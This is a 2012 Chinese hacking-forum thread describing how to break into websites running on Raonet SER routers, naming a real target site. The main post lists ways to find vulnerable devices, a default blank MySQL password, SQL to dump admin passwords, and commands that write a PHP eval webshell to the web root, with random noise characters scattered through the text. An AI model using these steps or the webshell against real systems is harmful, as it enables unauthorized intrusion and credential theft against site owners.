找回密码
 立即注册
查看: 3737|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
) J9 Y. s1 E. o
& P; L, _5 ?8 z8 s1:google搜索'Raonet Subscriber Ethernet Router'
3 _1 a: q3 d* \% _% g# n
* j5 X% _+ l/ F8 v5 o8 O% S2 @2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
* M0 f9 m, q1 I, g# I0 [" ~! f+ d( G! k" a
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
0 c. z( q" e; o3 v  t; R: V. N* Q# P" J% j  N; v
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
- ~; T- @6 H5 w' S3 M2 {; x
2 N) b$ A& T0 P  K5 ?6 w% m# }; [
/ J3 w; W# Y4 r) S; A( N& q  f& N* J
% O; z0 X" z* u  P& L7 n& ?" O  U入侵步骤:
* U2 O* S, g1 G4 ^! E1 s9 ^# P  W! S3 h
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php9 n6 \6 g& e) B: y5 A; N" c

0 f( f) {0 d; D5 ~2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc. Y; p& r7 Z- ~4 k- J- K1 K
3:得到密码后连接,查看GUI管理密码:
1 ?8 w3 z$ z! G3 ]9 A. }0 V7 Buse ser_500& m3 U0 F0 m/ \5 ^  J! `
select id,passwd from user;
$ E# `9 F1 U* w) x/ u  Y2 C* @% H8 K4:通过数据库写入webshell,执行命令:) F5 v$ ^, S2 ~  [
use mysql;
+ z* }. p! ]6 u& ]create table ok(cmd TEXT);0 [! j6 K$ H3 b9 W% \. o
insert into ok values("<?php @eval($_POST[cmd])?>");
. y$ `& Z( h( y, w9 a" Vselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";) }3 T) G0 R. a+ r8 Z6 P
drop table ok;4 k5 m! f  S6 u3 E5 Q$ q9 J

4 Y/ L4 |/ [( s  x5:连接后门shell.php 4 y+ Y9 b: N/ X
; o, B) Z+ D( g. B0 _- G
6. 搞定!
9 |% a* @* q# u5 B1 C4 K" {8 o# L: o/ R/ H4 Z+ ]* e7 N1 i
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表